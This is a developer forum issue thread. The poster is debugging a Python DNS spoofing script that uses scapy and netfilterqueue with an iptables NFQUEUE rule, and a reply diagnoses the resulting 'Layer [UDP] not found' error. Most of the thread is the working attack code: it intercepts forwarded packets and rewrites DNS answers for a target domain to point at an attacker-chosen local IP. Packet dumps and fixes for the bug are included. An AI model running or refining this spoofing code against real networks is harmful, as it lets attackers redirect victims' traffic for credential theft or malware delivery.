IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored

Question

IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored

pkahsan opened this issue 6 years ago · 2 comments

The iptables i use are:
iptables -I FORWARD -j NFQUEUE --queue-num 0

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.oldverision.com" in qname:
            print("[+] Spoofing target ")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.0.104")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            print("packet's summary: " + str(scapy_packet.summary()))
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            print("packet's summary after modify: " + str(scapy_packet.summary()))
            print(scapy_packet.show())
            print(packet.show())
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()

Following is the output:

[+] Spoofing target 
packet's summary: IP / ICMP / IPerror / UDPerror / DNS Ans "192.168.0.104" 
Exception IndexError: IndexError('Layer [UDP] not found',) in 'netfilterqueue.global_callback' ignored
[+] Spoofing target 
packet's summary: IP / UDP / DNS Ans "192.168.0.104" 
packet's summary after modify: IP / UDP / DNS Ans "192.168.0.104" 
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = None
  id        = 9623
  flags     = 
  frag      = 0
  ttl       = 63
  proto     = udp
  chksum    = None
  src       = 192.168.0.1
  dst       = 192.168.0.102
  \options   \
###[ UDP ]### 
     sport     = domain
     dport     = 61702
     len       = None
     chksum    = None
###[ DNS ]### 
        id        = 28104
        qr        = 1
        opcode    = QUERY
        aa        = 1
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 1
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]### 
         |  qname     = 'www.oldverision.com.'
         |  qtype     = A
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]### 
         |  rrname    = 'www.oldverision.com.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 0
         |  rdlen     = 4
         |  rdata     = '192.168.0.104'
        ns        = None
        ar        = None

following is the ping result:

Pinging www.oldverision.com [107.183.175.41] with 32 bytes of data:
Reply from 107.183.175.41: bytes=32 time=388ms TTL=227
Reply from 107.183.175.41: bytes=32 time=400ms TTL=227
Reply from 107.183.175.41: bytes=32 time=424ms TTL=227

Answer 1 · 2018-11-11T07:36:43.000Z

When it says something about an exception being ignored, this usually indicates a problem in the user code, not library code. It's a Cython thing.

If I had to guess, the exception comes from your del scapy_packet[scapy.UDP].len line when the input is a ICMP packet, based on the output you provided where it works on UDP and fails on ICMP, and the code you provided where it seems to be assuming all input is UDP.

Answer 2 · 2018-11-11T08:12:25.000Z

Even if i don't delete length of UDP, same error comes. but when i mention -p udp in iptables , then this exception error doesn't come. but big problem is that when i ping server from remote machine, the target still not spoofed, but packet is modified having rdata=redirect_ip